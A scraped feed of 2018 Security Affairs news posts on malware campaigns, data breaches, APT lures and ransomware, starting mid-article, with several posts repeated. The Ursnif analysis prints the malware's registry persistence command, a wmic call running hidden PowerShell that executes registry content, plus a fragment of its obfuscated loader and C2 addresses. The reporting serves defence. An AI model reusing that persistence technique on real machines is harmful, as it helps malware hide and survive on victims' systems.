The former one is a messaging protocol used to establish communication between a broker and multiple clients, the latter is a UDP client-server protocol that allows communications between nodes.

M2M protocols flaws

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and to make lateral movements.

Researchers monitored both protocols over a period of four months, they the attacker’s role for their research

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed the existence of security flaws that could be exploited to trigger DoS condition or execute arbitrary code. Trend Micro reported vulnerabilities to the developers of the affected software that have quickly released patches.

Below a video PoC of the attacks abusing the MQTT protocols:

The researchers did not find security flaws in the  CoAP protocol, but warned that it is susceptible to IP spoofing, attackers could exploit it for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252,5 explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risks that malware in the next future could abuse M2M protocols for malicious activity.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.

Dissecting the latest Ursnif DHL-Themed Campaign

Security experts at Yoroi – Cybaze Z-Lab discovered a new variant of the infamous Ursnif malware targeted Italian users through a malspam campaign.

Introduction

In the last weeks, a new variant of the infamous Ursnif malware was discovered hitting Italian users through a malspam campaign. In fact, Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment is a .js file and when it is launched, starts the infection by downloading other components from the Internet.

The Dropper

The initial dropper is an obfuscated javascript. Once run, it generates a lot of noisy internet traffic with the purpose to harden the detection of the real malicious infrastructures; as we can see from the following figures, the script contains a series of random-looking URLs it unsuccessfully tries to connect to, generating a huge volume of noise into the analysis environment.

dissecting-ursnif-dhl-campaign

Figure 1: Hard coded urls where the malware tries to connect to generate noise

dissecting-ursnif-dhl-campaign

Figure 2: Generated internet traffic noise

However, the real malicious action performed by the javascript is to create a batch file in the “%APPDATA%\Roaming\325623802.bat” path. The file is a simple script file containing the following code:

dissecting-ursnif-dhl-campaign

Figure 3: Extracted batch file

The script execution pops up to the screen a harmless “FedEx” brochure in pdf format used to decoy the victim, in the meanwhile it downloads and extract a PE32 executable file from a CAB archive hosted on a compromised Chinese website.

dissecting-ursnif-dhl-campaign

Figure 4: PDF downloaded to the internet and shown to the user

The second stage

The second stage of the infection chain is the “ppc.cab” file downloaded by the dropper to the “%APPDATA%\Roaming” location: it actually is a Microsoft Cabinet archive embedding an executable file named “puk.exe”.
The “puk.exe” file promptly spawns a new copy of its own process to make the debugging harder, then it starts several instances of the Internet Explorer process to hide its network activity inside legitimate processes.

Figure 5: spawned processes by the original “puk.exe”

The network traffic generated by the iexplore.exe processes points to the remote destination 149.129.129.1 (ALICLOUD-IN) and 47.74.131.146 (AL-3), part of the malicious infrastructure of the attacker.

dissecting-ursnif-dhl-campaign
Figure 6: C2 network traffic

The beaconing pattern recognized in the C2 communication is consistent with Gozi/Ursnif/IFSB/Dreambot malware variants. In addition, the particular “/wpapi/” base url adopted by the sample matches several malspam campaign tracked during the current year (rif EW. N070618N030618N010318).

dissecting-ursnif-dhl-campaign
Figure 7: Malware’s beaconing requests

Persistency

The third stage of the malware is designed to ensure its persistence into the infected system in the long run. It sets up a particular registry key containing chunks of binary data: “HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6”

dissecting-ursnif-dhl-campaign

Figure 9: Registry key written by the malware

Among the registry key shown above, there is an entry named “ddraxpps”: this particular name has been also used into the persistency mechanism of other Ursnif samples analyzed back in January.  Also, the malware configures a key named “comuroxy” containing a wmic “process call create” command designed to invoke powershell code from the “ddraxpps” entry: C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))".

The “ddraxpps” registry key stores a hex string could be decoded applying a simple hex-to-ascii conversion, its content actually is the following obfuscated powershell code:

Figure 10: body of “ddraxpps” key

The first line of code shows a set of commands allowing the execution of some kind of payload encoded in decimal format. The array of numbers in at line two represents the actual executable payload in decimal notation.

  1. $sagsfg=“qmd”;function ndltwntg{$sxpjuhsps=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($sxpjuhsps);};

The third line, instead, contains a base64 encoded powershell snippet revealing the usage of a known payload injection technique: the “APC injection” or “AtomBombing”, used to infect the “iexplore.exe” process.

dissecting-ursnif-dhl-campaign

Figure 11: Commands of the third row of “ddraxpps” key

All the commands shown in Figure 11 are necessary to perform the operation of APC Injection: in the first variable “$jtwhasq” there is the import of the necessary library “kernel32.dll”, in particular the functions “GetCurrentProcess()” and “VirtualAllocEx()”. The second row provides the importing of of the functions “GetCurrentThreadId()”, “QueueUserAPC()”, “OpenThread()”. The third contains the real injection: while the first two lines contains the preparation of all imports, functions and relative parameters, the third one is the responsible of the execution of the actual APC Injection technique. The first step is to properly create a Virtual Section using the “VirtualAllocEx()” function of the current process, identified thanks to “GetCurrentProcess()”. The malware is then copied to the virtual section and, finally, this section is injected in a local thread within the “iexplore.exe” process thanks to the “QueueUserAPC()” function.

Conclusion

In the end, the whole infection chain could be summarized in four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the registry key installed and the checking and the download of the Ursnif modules.

dissecting-ursnif-dhl-campaign

Figure 12. Representation of the infection chain

Further details, including IoCs and Yara rules, are reported in the original blog post published by Yoroi.

Dissecting the latest Ursnif DHL-Themed Campaign

Pierluigi Paganini

(Security Affairs – Ursnif, malware)

The post Dissecting the latest Ursnif DHL-Themed Campaign appeared first on Security Affairs.

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.



Security Affairs

4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.

Quora data breach: hackers obtained information on roughly 100 million users

Another day another illustrious victim of the data breach, the popular question-and-answer website Quora suffered a major data breach that exposed 100 million users.

On Monday, the popular question-and-answer website Quora suffered a major data breach, unknown hackers breached its systems and accessed 100 million user data.

The company is notifying the incident to the affected users and reset their passwords as a precautionary measure, it also reported it to law enforcement. Quora hired a forensics and security firm to assist in the investigation.

Quora is still investigating the security breach, it discovered the intrusion on  November 30 and attributed it to a “malicious third party.”

“We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.” reads the data breach notification.

“On Friday we discovered that some user data was compromised by a third party who gained unauthorized access to one of our systems.”

Exposed data includes name, email address, hashed password, data imported from linked networks, public content and actions (e.g. questions, answers, comments, and upvotes), and non-public content and actions (e.g. answer requests, downvotes, and direct messages).

“While the passwords were encrypted (hashed with a salt that varies for each user), it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.” continues the company.

quora data breach

Data belonging to users who posted anonymously was not exposed, financial data and social security numbers are at risk because the Quora platform doesn’t use it.

Quora has identified the root cause of the breach and has taken steps to address it, it did not disclose technical details on the incident.

The company announced additional efforts to mitigate the effects of the incident and to avoid future security breaches.

“Not all Quora users are affected, and some were impacted more than others.” states the FAQ page published by the company.

Pierluigi Paganini

(Security Affairs – Quora, Data breach)

The post Quora data breach: hackers obtained information on roughly 100 million users appeared first on Security Affairs.

Security Affairs: Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

Russia-linked cyber-espionage group Sofacy, (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium) use BREXIT lures in recent attacks.

Sofacy Brexit

The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.

In November 2018, malware researchers at the Cybaze ZLab- Yoroi team discovered a new variant of the dangerous APT28 Lojax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded via Base64, encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX
packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server that in turn deliver the next stage malware is the system is deemed interesting.

Further information on the attack, including mitigation, are reported in the analysis published by Accenture

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.



Security Affairs

Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

Russia-linked cyber-espionage group Sofacy, (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium) use BREXIT lures in recent attacks.

Sofacy Brexit

The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.

In November 2018, malware researchers at the Cybaze ZLab- Yoroi team discovered a new variant of the dangerous APT28 Lojax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded via Base64, encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX
packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server that in turn deliver the next stage malware is the system is deemed interesting.

Further information on the attack, including mitigation, are reported in the analysis published by Accenture

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.

Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning Open Elasticsearch instances expose over 82 million users in the United States.

Experts from HackenProof discovered Open Elasticsearch instances that expose over 82 million users in the United States.

Elasticsearch is a Java-based search engine based on the free and open-source information retrieval software library Lucene. It is developed in Java and is released as open source, it is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine the experts discovered three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”

The first IP discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (i.e. name, email, address, state, zip, phone number, IP address, and also employers and job title).

Experts discovered a second Index of the same archive that contained more than 25 million records with more detailed information (i.e. name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employees count, revenue numbers, NAICS codes, SIC codes, and etc).

Elasticsearch instances data leak

Overall, HackenProof says (PDF), 82,851,841 people were impacted by this data breach.

The overall number of records exposed in the unprotected Elasticsearch instances is over 114,686,118 (114,686,118), according to HackenProof 2,851,841 individuals were impacted by this data leak.

At the time it is not clear which is the ownership of the exposed Elasticsearch instances, experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the incident to the company, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine for how long data remained exposed online, the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

Earlier 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals, hackers can compromise them by installing a malware and gain full administrative privileges on the underlying servers.

Pierluigi Paganini

(Security Affairs – Elasticsearch installs, hacking)

 

The post Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances appeared first on Security Affairs.

Security Affairs: New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand intelligence agency asked mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, it asked mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the FiveEyes intelligence alliance, the remaining countries (UK, US, Australia), except Canada, banned Huawei over security fears.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

Which is the Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau, it is doing all the best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.



Security Affairs

New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand intelligence agency asked mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, it asked mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the FiveEyes intelligence alliance, the remaining countries (UK, US, Australia), except Canada, banned Huawei over security fears.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

Which is the Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau, it is doing all the best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.

Hacker hijacks printers worldwide to promote popular YouTube channel

The TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to hijack +50k vulnerable printers to Promote PewDiePie YouTube Channel.

An anonymous hacker hijacked over 50,000 internet-connected printers worldwide to print out messages promoting the subscription to the PewDiePie YouTube channel. Felix Arvid Ulf Kjellberg, aka PewDiePie, is a popular Swedish Youtuber, comedian, and video game commentator, formerly best known for his Let’s Play commentaries and now mostly known for his comedy and vlogs.

This is the last act of disputed for the “most-subscribed Youtube channel” crown between T-Series and PewDiePie.

The PewDiePie has more than 73 million YouTube subscribers.

Now a hacker with the Twitter account TheHackerGiraffe decided to promote his favourite YouTube channel in his way, he hacked tens of thousands of printers exposed online.

hacked printers

The hacker scanned the Internet for printers with port 9100 open using Shodan and hacked them publishing a message that invited the victims to unsubscribe from T-Series channel and subscribe to PewDiePie instead.

“PewDiePie is in trouble, and he needs your help to defeat T-Series!”

“PewDiePie, the currently most subscribed to channel on YouTube, is at stake of losing his position as the number one position by an Indian company called T-Series that simply uploads videos of Bollywood trailers and campaigns,”

The TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to compromise vulnerable printers. The PRET is a legitimate developed by researchers from Ruhr-Universität Bochum in Germany for testing purposes.

The case is very singular and raises the discussion about the importance of properly secure Internet-connected devices.
In this case, attackers simply printed out a message but vulnerable printers exposed online could be the entry points for attackers that with further lateral movements can compromise an entire network and access sensitive information.
printers hijacking

Don’t forget that every device in your organization that is exposed online enlarges your attack surface.

Pierluigi Paganini

(Security Affairs – vulnerable printers, hacking)

The post Hacker hijacks printers worldwide to promote popular YouTube channel appeared first on Security Affairs.

Security Affairs: Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.



Security Affairs

Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

